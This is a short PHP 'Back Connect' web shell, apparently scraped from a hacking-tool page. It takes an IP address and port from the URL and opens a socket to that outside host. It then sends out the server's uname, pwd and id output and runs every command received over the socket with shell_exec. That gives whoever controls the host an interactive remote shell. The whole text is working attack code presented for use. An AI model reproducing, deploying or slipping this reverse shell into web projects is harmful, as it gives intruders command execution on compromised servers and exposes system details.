Welcome to Back Connect Control Panel

Fill in the form Below to Start the Back Connect Service

The Program is now trying to connect!

"; $ip = $_GET['ip']; $port=$_GET['port']; $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0) { echo "$errno : $errstr"; } else if (!$sockfd) { $result = "

Fatal : An unexpected error was occured when trying to connect!

"; } else { fputs ($sockfd , "\n=================================================================\n Back Connect in PHP\n Coded by lionaneesh\n @@author : lionaneesh @@facebook : facebook.com/lionaneesh @@Email : lionaneesh@gmail.com \n================================================================="); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $id = shell_exec("id"); $dateAndTime = shell_exec("time /t & date /T"); $len = 1337; fputs($sockfd ,$sysinfo . "\n" ); fputs($sockfd ,$pwd . "\n" ); fputs($sockfd ,$id ."\n\n" ); fputs($sockfd ,$dateAndTime."\n\n" ); while(!feof($sockfd)) { $cmdPrompt ="(Shell)[$]> "; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd); } } else { ?>

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